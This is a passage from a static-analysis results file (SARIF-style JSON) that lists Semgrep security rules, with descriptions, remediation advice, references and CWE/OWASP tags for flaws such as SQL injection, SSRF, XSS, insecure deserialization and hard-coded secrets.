scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"help":{"markdown":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors)\n - [https://flask.palletsprojects.com/en/3.0.x/debugging/](https://flask.palletsprojects.com/en/3.0.x/debugging/)\n","text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"helpUri":"https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","id":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","name":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"help":{"markdown":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","id":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","name":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"help":{"markdown":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2)\n","text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2","id":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","name":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-multiprocess2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"help":{"markdown":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session)\n - [https://en.wikipedia.org/wiki/Session_poisoning](https://en.wikipedia.org/wiki/Session_poisoning)\n","text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session","id":"php.lang.security.injection.tainted-session.tainted-session","name":"php.lang.security.injection.tainted-session.tainted-session","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-session.tainted-session"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"help":{"markdown":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n","text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"helpUri":"https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","id":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","name":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf","id":"java.servlets.security.tainted-ssrf.tainted-ssrf","name":"java.servlets.security.tainted-ssrf.tainted-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf.tainted-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","id":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","name":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"help":{"markdown":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"helpUri":"https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","id":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","name":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"help":{"markdown":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n","text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","id":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","name":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","id":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","name":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint","id":"rust.rocket.nosql.mongodb-taint.mongodb-taint","name":"rust.rocket.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection","id":"java.lang.security.audit.el-injection.el-injection","name":"java.lang.security.audit.el-injection.el-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.el-injection.el-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"help":{"markdown":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string","id":"java.spring.security.injection.tainted-html-string.tainted-html-string","name":"java.spring.security.injection.tainted-html-string.tainted-html-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-html-string.tainted-html-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","id":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","name":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","id":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","name":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","id":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","name":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli)\n - [https://www.npmjs.com/package/pg](https://www.npmjs.com/package/pg)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli","id":"javascript.express.pg.express-pg-sqli.express-pg-sqli","name":"javascript.express.pg.express-pg-sqli.express-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.pg.express-pg-sqli.express-pg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"help":{"markdown":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off)\n - [https://docs.djangoproject.com/en/3.1/ref/settings/#templates](https://docs.djangoproject.com/en/3.1/ref/settings/#templates)\n - [https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates](https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates)\n","text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","id":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","name":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.context-autoescape-off.context-autoescape-off"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"help":{"markdown":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate)\n - [https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345](https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345)\n","text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","id":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","name":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"help":{"markdown":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","id":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","name":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","properties":{"precision":"very-high","tags":["CWE-406: Insufficient Control of Network Message Volume (Network Amplification)","LOW 